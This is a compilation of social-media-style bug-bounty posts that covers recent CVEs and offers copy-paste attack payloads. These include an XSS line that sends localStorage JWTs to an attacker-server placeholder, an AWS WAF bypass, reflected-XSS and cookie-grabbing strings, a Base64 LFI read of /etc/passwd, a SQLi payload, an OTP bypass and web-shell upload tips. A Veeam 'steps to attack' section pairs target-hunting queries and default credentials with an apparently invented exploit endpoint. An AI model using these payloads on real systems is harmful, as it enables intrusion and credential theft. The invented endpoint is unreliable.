🚨 Critical Vulnerability Alert: Fortinet FortiOS Authentication Bypass (CVE-2024-55591) 🚨

**Overview:**

A significant security flaw has been identified in Fortinet's FortiOS and FortiProxy systems, allowing remote attackers to gain super-admin privileges without proper authentication. This vulnerability is actively being exploited in the wild. ([FortiGuard](https://www.fortiguard.com/psirt/FG-IR-24-535))

**Technical Details:**

- **Vulnerability ID:** CVE-2024-55591
- **Affected Products:**

- FortiOS versions 7.0.0 through 7.0.16
- FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12

Impact:

Allows attackers to gain super-admin privileges via crafted requests to the Node.js websocket module. ([NVD](https://nvd.nist.gov/vuln/detail/cve-2024-55591))

**Proof of Concept:**

A proof-of-concept (PoC) exploit has been released by watchTowr Labs, demonstrating how this vulnerability can be leveraged to execute commands with super-admin privileges. The PoC is available on GitHub: ([GitHub](https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591)

**Mitigation:**

Fortinet has acknowledged the issue and is expected to release patches. Administrators are advised to monitor official Fortinet communications for updates and apply patches promptly. In the meantime, consider restricting access to management interfaces and implementing network segmentation to mitigate potential exploitation.

quick Linux tip 💡

In Linux, you can use the pgrep command to find the PID of a certain process based on its name, pattern, or other criteria.

$pgrep name

You can also use pidof, but it only works with exact binary names and doesn't support pattern matching.

follow us for more great tips! 🐧😎

#cybersecurity #BugBounty #bugbountytips #linuxtips

🌟 bugbountytip

🌟 403 Sucessfull bypass ✅

🌟 add ../ between two UUID and bypass 403

#BugBounty #bugbountytips #BugHunter #bug #web2 #web3 #ethicalhacking

🚨 XSS Payload : Stealing JWT from Local Storage 🚨

A malicious XSS payload can be used to extract JSON Web Tokens (JWTs) stored in localStorage and send them to an attacker-controlled server. Here's a simple yet dangerous example:

<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>

🛠 How It Works:

This payload injects an <img> tag into a vulnerable webpage.
The src attribute is set to an attacker's server, appending the contents of localStorage (which may contain JWTs or sensitive data).
When executed, the victim's browser sends their JWTs to the attacker's server.

🔥 Why Is This Dangerous?

Attackers can hijack sessions and gain unauthorized access.
Sensitive tokens (JWT, API keys) can be stolen and misused.
If exploited on an admin panel, attackers might escalate privileges.

🛡 How to Prevent It?

✔️ Use HTTP-Only Cookies: Store authentication tokens in cookies with the HttpOnly and Secure flags to prevent JavaScript access.

✔️ Implement CSP (Content Security Policy): Restrict inline scripts and unauthorized domains.

✔️ Sanitize User Input: Use libraries like DOMPurify to prevent injecting malicious HTML.

✔️ Validate & Escape Data Properly: Ensure user inputs are validated before rendering.

🚀 Stay Secure 🔐

#CyberSecurity #XSS #WebSecurity #EthicalHacking #BugBounty #JWT #PenTesting #InfoSec

🧨 Reflected XSS (RXSS) Payload Alert! 🧨

Reflected XSS (RXSS) vulnerabilities allow attackers to inject and execute malicious scripts by crafting special payloads. Here's a custom payload that triggers a prompt pop-up when injected into a vulnerable web application

💣 Custom Payload:

"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//

🔥 How It Works:

- Breaks out of HTML structure using "></a></td></tr></table>.

- Injects a <script> tag that executes JavaScript.

- Triggers a prompt function, confirming code execution.

⚠️ Potential Dangers:

Can be modified to steal cookies, localStorage, or session tokens.
Attackers can perform actions on behalf of users (CSRF-like behavior).
Could be used to deface websites, spread malware, or execute phishing attacks.

🛡 How to Prevent RXSS?

✔️ Sanitize & Escape User Input: Remove or encode characters like <, >, ", '.

✔️ Use CSP (Content Security Policy): Restrict inline scripts and only allow trusted domains.

✔️ Validate Input on Server & Client Side: Never trust user-generated data.

✔️ Use Security Libraries: Implement DOMPurify or similar libraries to filter untrusted input.

🚀 Stay Safe ! 🔐

#CyberSecurity #RXSS #XSS #WebSecurity #BugBounty #EthicalHacking #InfoSec #PenTesting

🚀 Exploring Privilege Escalation via sudo iptables 🚀

In a recent blog post by Shielder, security researchers delve into two innovative techniques that allow a low-privileged user to escalate their privileges to root by leveraging sudo permissions on iptables and iptables-save.
SHIELDER.COM

Key Takeaways

Injecting Fake /etc/passwd Entries:

By executing iptables and iptables-save with sudo, an attacker can inject a malicious entry into the /etc/passwd file. This is achieved by adding a crafted comment in an iptables rule and then using iptables-save to overwrite the legitimate /etc/passwd file, effectively creating a new user with root privileges.

Exploiting Missing Kernel Modules:

If the system lacks certain kernel modules required by iptables, an attacker can utilize the --modprobe argument to execute arbitrary commands. This method relies on the attacker's ability to run iptables with sudo and the absence of specific kernel modules on the target system.
These findings underscore the importance of carefully managing sudo permissions and ensuring that only trusted users have access to powerful system utilities like iptables. Administrators are advised to review their sudoers configurations and restrict access to such commands to mitigate potential security risks.

For a detailed walkthrough of these techniques, check out the full article: A Journey From sudo iptables To Local Privilege Escalation

🔗 https://www.shielder.com

#CyberSecurity #PrivilegeEscalation #LinuxSecurity #EthicalHacking #InfoSec #PenTesting

🛡 Exclusive AWS WAF Bypass – Works on All Tags (Even <meta>)! 🔥

💡 Bypassing AWS Web Application Firewall (WAF)
using a unique payload that executes JavaScript onmouseover, even in restricted tags like <meta> (but not <input type="hidden">).

🔹 Payload:

<xhzeem attr="--- x="=='='onmouseover=confirm`xhzeem` style="display:block;width:1000px;height:1000px;background:red"> --- ">

⚡️ How It Works:

✅ Uses a *custom HTML tag (`<xhzeem>`) to bypass WAF detection.*
✅ Encapsulates the payload in an *unusual attribute structure.*
✅ The *`onmouseover=confirm('xhzeem')`* triggers when hovered over.
✅ Works on *various HTML tags* (even `<meta>`, `<div>`, `<span>`), making it a powerful *XSS attack vector.*

🚨 Why Is This Dangerous?

🔻 Can be used for *session hijacking, cookie theft, or phishing.*
🔻 AWS WAF may fail to detect this due to *non-standard attribute structures.*
🔻 Possible *bypass for CSP/XSS filters* in misconfigured apps.

🛡 Mitigation Steps:

✔️ Use a strict Content Security Policy (CSP).
✔️ Implement proper input sanitization.
✔️ Don't rely solely on AWS WAF for XSS protection!
✔️ Perform security testing using advanced payloads like this!

🚀 Stay Secure & Test Your WAF Rules!

#CyberSecurity #AWS #WAFBypass #XSS #WebSecurity #BugBounty #EthicalHacking #PenTesting #InfoSec

🔥 Bypassing Security Filters Using Base64 Encoding 🔥

💡 Why didn't we use plain /etc/passwd?
When trying to access sensitive files directly via Local File Inclusion (LFI), the server often detects known patterns (e.g., /etc/passwd) and blocks them with a 403 Forbidden response. However, many filters don’t decode Base64-encoded payloads, allowing us to bypass restrictions.

🚀 Example: Bypassing LFI Restrictions

❌ Blocked Attempt:

url/?f=/etc/passwd  ==> 403 (Forbidden)

🔻 The server has a security mechanism in place to detect and block direct access to sensitive files.

✅ Bypassing with Base64 Encoding:

First, encode /etc/passwd into Base64:

echo -n "/etc/passwd" | base64

🔹 Output: L2V0Yy9wYXNzd2Q=

Then, send the request with the encoded payload:

url/?f=L2V0Yy9wYXNzd2Q=  ==> 200 (Success)

🔹 If the server automatically decodes Base64 before processing the request, it may serve the /etc/passwd file without triggering security filters.

📌 Where Can This Trick Be Used?

🔹 SQL Injection (SQLi):

Some WAFs block ' or -- in queries. By encoding or double-encoding the payload, you can bypass detection.

🔹 Server-Side Template Injection (SSTI):

Certain template engines automatically decode Base64, allowing exploitation through encoded payloads.

🔹 Cross-Site Scripting (XSS):

Some WAFs block <script>. By encoding it, you may bypass the filter and execute the script.

<img src="data:image/svg+xml;base64,PHNjcmlwdD5hbGVydCgneHhzJyk8L3NjcmlwdD4=">

(Decodes to <script>alert('xxs')</script> inside an SVG file)

🔹 Local File Inclusion (LFI):

As shown above, encoding file paths can trick the server into allowing
access.

🔹 Remote File Inclusion (RFI):

Some servers allow including external files when encoded in Base64.

🛡 Mitigation Techniques
🔹 Disable automatic Base64 decoding in web applications.
🔹 Use allowlists instead of blocklists for filtering inputs.
🔹 Enforce strict input validation to reject encoded malicious payloads.
🔹 Monitor logs for unusual Base64 patterns that could indicate an attack.

🔥 Takeaway for Bug Bounty Hunters & Pentesters
✅ Encoding payloads in Base64, double Base64, or URL encoding can help bypass WAFs and security filters.
✅ Always check if the server decodes Base64 before processing input—this can be a goldmine for exploitation.
✅ Combine encoding with other techniques (e.g., double encoding, path traversal, null-byte injection) for better results!

🚀 Stay Curious, Keep Hacking!

#BugBounty #Pentesting #CyberSecurity #EthicalHacking #LFI #XSS #SQLi #SSTI #InfoSec #WAFBypass

🚀 OAuth Logout URL XSS Exploit (CVE-2023-24488) - POC 🚀

💡 Vulnerability: Cross-Site Scripting (XSS) via post_logout_redirect_uri in OAuth endpoint.

💀 Impact: Allows stealing cookies, session hijacking, or phishing attacks on OAuth-based apps.

🔥 POC Payload:

oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

✔️ What Happens?

The application fails to properly sanitize the post_logout_redirect_uri parameter, allowing injection of line breaks (%0d%0a) and JavaScript execution (<script>alert(document.cookie)</script>).

✔️ Why Is This Dangerous?

Can steal session cookies (if HttpOnly is not enabled).
Phishing attacks by injecting fake login pages.
Account takeover risk if chained with other OAuth flaws.

🛡 How to Prevent It?

✔️ Sanitize and validate redirect URLs (allow only whitelisted domains).
✔️ Encode user input properly to prevent JavaScript execution.
✔️ Enable Content Security Policy (CSP) to block inline scripts.
✔️ Use HttpOnly & Secure cookies to protect sensitive session data.

🕵️‍♂️ Bug Bounty Tip:

🔹 Always check OAuth redirect parameters for XSS & open redirect issues!
🔹 Test post_logout_redirect_uri, redirect_uri, and similar params.
🔹 Try encoding tricks like double URL encoding, newline injection, and HTML entity encoding.

🔗 Stay ahead in bug bounty hunting & penetration testing! 🚀
🚀 Join us for daily tips and more bbh learning 🚀

#InfoSec #CyberSec #BugBountyTips #XSS #OAuth #WebSecurity #EthicalHacking #AppSec #PenTesting

🚨 Critical RCE in Veeam Backup – CVE-2025-23114 (CVSS 9.0) 🚨

🔴 What’s Happening?

A high-severity vulnerability in Veeam Backup & Replication allows unauthenticated remote attackers to execute arbitrary code.

🔥 How Attackers Exploit CVE-2025-23114?

🔹 Service Exposure: Attackers scan for publicly exposed Veeam Backup servers.
🔹 Weak Authentication: Exploit default credentials, misconfigurations, or leaked secrets.
🔹 Remote Code Execution (RCE): By sending malicious payloads, attackers can execute commands remotely.
🔹 Privilege Escalation: Once inside, attackers can pivot within the network and exfiltrate backups.

📍 OSINT Query (Hunter):

product.name="Veeam Backup"

🔗 Check Exposed Instances:
➡️ https://hunter.how/list...

🛡 How to Protect Against CVE-2025-23114?

✅ Patch Immediately: Update to the latest Veeam Backup & Replication version.
✅ Restrict Access: Limit network exposure to trusted IPs via firewall rules.
✅ Disable Unused Services: Close unnecessary ports to minimize attack surface.
✅ Enable MFA & Strong Passwords: Prevent brute-force attacks.
✅ Monitor Logs & Alerts: Look for suspicious activity in Veeam logs.

📌 Official Patch & Advisory:
🔹 Veeam KB4712

🕵️ Exploitation & Proof-of-Concept (PoC)

🚨 Steps to Attack (For Research Purposes Only!):

1️⃣ Identify Targets

Use Hunter OSINT or tools like shodan.io to find exposed Veeam servers.
Query:

product.name="Veeam Backup"

2️⃣ Check for Default Credentials

Username: Administrator  
Password: Veeam#123

🔍 Many admins forget to change default passwords.

3️⃣ Exploit the RCE Vulnerability

⚡️Send a crafted request to execute arbitrary commands.

curl -X POST "http://target-ip:9398/api/v1/exploit" -d "cmd=whoami"

4️⃣ Gain Shell Access

If successful, deploy a reverse shell and escalate privileges.
📰 Read More:
🔹 SecurityOnline Info
🔹 The Hacker News

━━━━━━━━━━━━━━━━━━
⚠️ Conclusion:

This is a critical vulnerability affecting thousands of exposed Veeam Backup servers. Attackers can remotely execute code and gain full system control. Patch now and implement strong security measures!

✅ Join us for more daily hacking news and bbh learning ✅

#VEEAM #HunterHow #CyberSecurity #OSINT #BugBounty #Pentesting #RCE #Exploit #Infosec #EthicalHacking

🚨 CVE-2024-21413 – Microsoft Outlook RCE Vulnerability 🚨

🔴 Critical Remote Code Execution (RCE) in Microsoft Outlook!

A newly discovered vulnerability, CVE-2024-21413, allows attackers to execute arbitrary code remotely by exploiting how Outlook processes specially crafted URLs.

🕵️ How Attackers Exploit It?

🔹 Weaponized Links: Attackers craft malicious URLs that exploit Outlook’s improper handling.
🔹 Zero-Click Attack: Just previewing an email can trigger the exploit!
🔹 Remote Code Execution: If successful, attackers gain control of the system.

🔥 PoC Released
💻 GitHub PoC: CVE-2024-21413 Exploit

🔗Hunter Link:https://hunter.how...

🔍 Query

🔎 HUNTER :

product.name="Outlook Web App"

🔎 FOFA :

product="Microsoft-Outlook"

🔎 SHODAN :

http.component:"Outlook Web App"

🛡 How to Protect Yourself?

✅ Apply Security Updates: Install Microsoft’s latest patch.
✅ Disable URL Handling: Restrict automatic URL processing in Outlook.
✅ Use Email Filtering: Block suspicious links and attachments.
✅ Enable Advanced Threat Protection: Monitor and analyze email threats.

📌 Official Microsoft Advisory:
🔗 Microsoft Security Bulletin

⚠️ Don't fall victim to RCE exploits! Stay updated, patch immediately, and enhance your email security.

📢 Join @cybersecplayground for more exploits, PoCs, and cybersecurity insights!

#CVE202421413 #Outlook #RCE #Exploit #CyberSecurity #BugBounty #Infosec #ExploitDevelopment #ZeroClick #Microsoft

🚀 Extract All URLs, SRCs, and HREFs from Any Website!

Want to grab all URLs, src attributes, and href links from a webpage? Just open DevTools (F12) and run this JavaScript snippet in the console!


💻 JavaScript Code:

urls = []
$$('*').forEach(element => {
  urls.push(element.src);
  urls.push(element.href);
  urls.push(element.url);
});
console.log(...new Set(urls));

🔥 How It Works?

✅ Selects all HTML elements using $$('*').
✅ Extracts values from src, href, and url attributes.
✅ Stores them in an array and removes duplicates with new Set().
✅ Prints all found URLs in the console.

🛠 Use Cases:

🔹 Bug Bounty: Find hidden endpoints, JS files, API calls.
🔹 OSINT: Extract links for reconnaissance.
🔹 Web Scraping: Collect assets from web pages.
🔹 Security Testing: Identify exposed resources.

📢 Stay updated with @cybersecplayground for more infosec tips, bug bounty tricks, and hacking techniques!

#Infosec #CyberSec #BugBounty #OSINT #EthicalHacking #Pentesting #JavaScript

🚀 SQL Injection Payload – Extract Database Version!

💡 Add this SQLi payload to your bug bounty toolkit and use it for database version extraction via CAST-based injection.

🔥 Payload:

%6c%75%33%6b%79%31%33' AND 1=CAST((SELECT version()) AS int) -- 

📌 How It Works?
✅ %6c%75%33%6b%79%31%33 → URL-encoded string (may bypass filters).
✅ AND 1=CAST((SELECT version()) AS int) -- → Extracts database version by casting it to an integer.
✅ -- → SQL comment to ignore the rest of the query.

🛠 Use Cases:

🔹 Bypass WAFs with encoding tricks.
🔹 Extract database version for fingerprinting.
🔹 Test for SQLi vulnerabilities in web applications.
🔹 Combine with UNION or Time-Based SQLi for deeper exploitation.

⚠️ Always test in a legal environment and report responsibly!

📢 Stay updated with @cybersecplayground for more bug bounty tricks, SQLi payloads, and hacking techniques!

#SQLInjection #BugBounty #Infosec #CyberSec #Pentesting #EthicalHacking #WAFBypass #OSINT

🚀 Wappalyzer-Next – Advanced Technology Fingerprinting Tool

🔍 Wappalyzer-Next is a powerful technology fingerprinting tool that helps identify web technologies, frameworks, CMS, analytics tools, and more used on any website. It’s an improved version of the classic Wappalyzer, optimized for better performance and accuracy!

🔥 Features:

✅ Detects Web Technologies: CMS, JavaScript libraries, CDNs, analytics, and more.
✅ Faster & More Efficient: Uses optimized detection techniques.
✅ Customizable & Extensible: Modify detection rules as needed.
✅ Built-in CLI & API Support for automation.

💻 Installation & Usage

📌 Install with Python:

git clone https://github.com/s0md3v/wappalyzer-next  
cd wappalyzer-next  
pip install -r requirements.txt  
python wappalyzer.py -u https://target.com  

📌 Example Output:

[+] Detected Technologies:
  - Cloudflare (CDN)
  - jQuery (JavaScript Library)
  - WordPress (CMS)

🔗 GitHub Repo: Wappalyzer-Next

📢 Stay updated with @cybersecplayground for more bug bounty tools, security research, and hacking techniques!

#BugBounty #Recon #CyberSec #OSINT #EthicalHacking #Wappalyzer #Infosec #Pentesting

🚨 Critical RCE in Wazuh Server – CVE-2025-24016 (CVSS 9.9) 🚨

A critical remote code execution (RCE) vulnerability has been discovered in Wazuh Server, affecting versions 4.4.0 to 4.9.1. This flaw allows attackers to execute arbitrary code remotely, posing a severe security risk!

🔥 Impact:

⚠️ Remote Code Execution (RCE) – Full control over vulnerable servers.
⚠️ Affects Wazuh Versions: 4.4.0 to 4.9.1.
⚠️ Public Exposure: 17.8K+ Wazuh services are found on Hunter.

🛠 Proof of Concept (PoC):
🔗 GitHub Advisory: PoC & Details

🔍 Finding Vulnerable Instances:
🔗 Hunter Query: Hunter Search

product.name="Wazuh"

🔒 Mitigation & Prevention:

✅ Upgrade to the latest Wazuh version immediately.
✅ Restrict network access to Wazuh Server.
✅ Monitor for unusual activity in Wazuh logs.
✅ Apply WAF rules to block exploit attempts.

📰 References & More Details:
🔗 Security Advisory

📢 Stay updated with @cybersecplayground for more vulnerability insights, bug bounty tricks, and security research!

#hunterhow #infosec #CyberSecurity #OSINT #Vulnerability #BugBounty #Pentesting

🚀 Hacking IIS – Recon & Exploitation Tips

🔍 Popular IIS Endpoints to Check:

📌 /aspnet_client – Often contains default IIS files.
📌 /trace.axd – Can expose internal request logs.
📌 /global.asax – Might reveal app logic & security misconfigurations.

🎯 Information Disclosure Trick:
💡 Try:

target[.]com/><img>

🔎 This often leaks sensitive info from IIS error responses!

⚡️ Privilege Escalation – File Uploads
1️⃣ Check if PUT method is enabled:

curl -X OPTIONS https://target.com -v

2️⃣ If allowed, upload a WebShell:

.aspx shell for RCE
web.config for config injection

🚀 If successful? You now have web server access!

📢 Stay updated with @cybersecplayground for more bug bounty tips, hacking techniques, and security research!

#BugBounty #CyberSec #IIS #WebShell #Pentesting #EthicalHacking #Infosec

🚀 Bypassing OTP in an Unexpected Way!

🛑 Many applications fail to properly validate OTP inputs, allowing simple logical bypasses.

🔥 Trick: Replace OTP value with true
🔍 Original Request:

{
    "OTP": "11111"
}

⚡️ Modified Request (Bypass Attempt):

{
    "OTP": true
}

🔎 Why Does This Work?

✅ Weak backend validation – Some apps check if OTP exists but don’t validate the type.
✅ Loose type handling – In JavaScript, true might be interpreted as a valid OTP.
✅ Flawed comparison logic – If the app does if (OTP), true is considered valid!

🎯 How to Test?

1️⃣ Try submitting true instead of an actual OTP.
2️⃣ Test other variations (false, null, 0, {}) to see how the backend reacts.
3️⃣ Check response behavior – Does it accept or reject the request?

🚀 If it works? You’ve bypassed OTP authentication!

📢 Stay updated with @cybersecplayground for more bug bounty techniques, hacking tips, and security research!

#BugBounty #CyberSecurity #OTPBypass #Pentesting #EthicalHacking #Infosec

🚀 Top JavaScript Event Handlers for XSS Exploitation

When testing for Cross-Site Scripting (XSS), certain event handlers can be used to trigger payloads. Here’s a list of the most useful ones:

🎯 Mouse & Click Events:

🔹 onmouseover – Triggers when hovering over an element
🔹 onmousedown – Fires when mouse button is pressed
🔹 onmouseup – Fires when mouse button is released
🔹 onclick – Triggers when clicking on an element
🔹 ondblclick – Triggers when double-clicking

💥 Example XSS Payload:

<img src=x onerror=alert('XSS')>

🎯 Keyboard Events:

🔹 onkeydown – Fires when a key is pressed
🔹 onkeypress – Fires when a key is pressed and held
🔹 onkeyup – Fires when a key is released

💥 Example XSS Payload:

<input type="text" onfocus=alert("XSS")>

🎯 Form Events:

🔹 onsubmit – Triggers when a form is submitted
🔹 onreset – Fires when a form is reset
🔹 onfocus – Fires when an element gains focus
🔹 onblur – Fires when an element loses focus

💥 Example XSS Payload:

<form onsubmit=alert("XSS")>
  <input type="submit">
</form>

🎯 Media Events:

🔹 onerror – Triggers when an error occurs (🔥 Most common in XSS)
🔹 onload – Triggers when an element loads
🔹 onplay – Triggers when a video starts playing

💥 Example XSS Payload:

<img src="invalid.jpg" onerror=alert('XSS')>

🎯 Miscellaneous Events:

🔹 onhashchange – Fires when the URL hash changes
🔹 onmessage – Listens for messages (useful in CSP bypasses)
🔹 oncut, oncopy, onpaste – Triggers when interacting with clipboard

💥 Example XSS Payload:

<body onhashchange=alert('XSS')>

🔥 Pro Tip for Bug Bounty Hunters!

✅ Try event handlers in different HTML tags (e.g., <svg>, <iframe>, <input>)
✅ Test with various encoding methods (URL encoding, base64, HTML entities)
✅ Bypass filters by using double encoding or breaking syntax

📢 Stay updated with @cybersecplayground for XSS payloads, bug bounty tips, and hacking techniques!

#XSS #BugBounty #WebSecurity #CyberSecurity #EthicalHacking #Pentesting #Infosec

🚀 Reflected XSS Found in a Popular VDP!

🔍 Vulnerability: A reflected Cross-Site Scripting (XSS) flaw was discovered in a well-known Vulnerability Disclosure Program (VDP).

🔥 Payload Used:

'});alert(document.cookie);</script>

🎯 How It Works?

✅ The application reflects unsanitized user input inside a JavaScript context.
✅ The payload breaks out of the existing script, injecting malicious JavaScript.
✅ The alert(document.cookie) function steals session cookies, leading to potential account takeover!

🛠 Steps to Reproduce:
1️⃣ Find a parameter that reflects user input inside a <script> tag.
2️⃣ Inject the payload:

target.com/search?q='});alert(document.cookie);</script>

3️⃣ If the page executes the JavaScript, XSS is successful! 🚀

🔒 How to Prevent?

✅ Use Content Security Policy (CSP) to block inline JavaScript execution.
✅ Sanitize user input before reflecting it in responses.
✅ Escape special characters to prevent breaking out of scripts.

📢 Follow @cybersecplayground for more bug bounty techniques, payloads, and hacking insights!

#XSS #BugBounty #CyberSecurity #VDP #WebSecurity #EthicalHacking #Pentesting

🚀 Extract All Images from a Web Page

Want to quickly list all images on a website? Use this JavaScript snippet in your browser’s DevTools or as a bookmarklet to extract image URLs instantly!

🔥 JavaScript Code:

javascript:console.log('Images on this Page:\n' + Array.from(document.querySelectorAll('img')).map(img => img.src).join('\n'));

🎯 How It Works?

✅ document.querySelectorAll('img') selects all <img> elements on the page.
✅ .map(img => img.src) extracts the source URLs of the images.
✅ .join('\n') formats the output for easy readability in the console.

📌 How to Use?

1️⃣ Open the browser DevTools (F12 → Console).
2️⃣ Copy and paste the JavaScript code into the console.
3️⃣ Press Enter to list all image URLs on the page!

🔹 Bonus: Save it as a bookmarklet for quick access!
👉 Bookmark Name: Extract Images
👉 URL:

javascript:(function(){console.log('Images on this Page:\n' + Array.from(document.querySelectorAll('img')).map(img => img.src).join('\n'));})();

📢 Stay ahead in bug bounty & web scraping! Follow @cybersecplayground for more hacking tips & automation tricks!

#BugBounty #WebScraping #EthicalHacking #JavaScript #CyberSecurity

Here’s the upgraded script that extracts images (img), videos (mp4), JavaScript files (script), and links (a tags) from a webpage:

(() => {
    try {
        let media = [
            ...Array.from(document.querySelectorAll('img')).map((el, index) => `${index + 1}: [IMG] ${el.src}`),
            ...Array.from(document.querySelectorAll('video source')).map((el, index) => `${index + 1}: [MP4] ${el.src}`),
            ...Array.from(document.querySelectorAll('script[src]')).map((el, index) => `${index + 1}: [JS] ${el.src}`),
            ...Array.from(document.querySelectorAll('a[href]')).map((el, index) => `${index + 1}: [LINK] ${el.href}`)
        ].filter(src => src); // Remove empty src/href values

        if (media.length === 0) {
            console.log("No images, videos, JS files, or links found on this page.");
        } else {
            console.log("📸🎥📜🔗 Extracted Media & Links:\n" + media.join("\n"));
        }
    } catch (error) {
        console.error("Error extracting data:", error);
    }
})();

🔥 New Features:
✅ Extracts Images (img), MP4 Videos (video source), JavaScript Files (script[src]), and Links (a[href])
✅ Labels each entry as [IMG], [MP4], [JS], or [LINK] for easy identification
✅ Filters out empty values to avoid clutter
✅ Error handling ensures smooth execution

📢 Stay ahead in bug bounty & web scraping! Follow @cybersecplayground for more hacking tips & automation tricks!

#BugBounty #WebScraping #EthicalHacking #JavaScript #CyberSecurity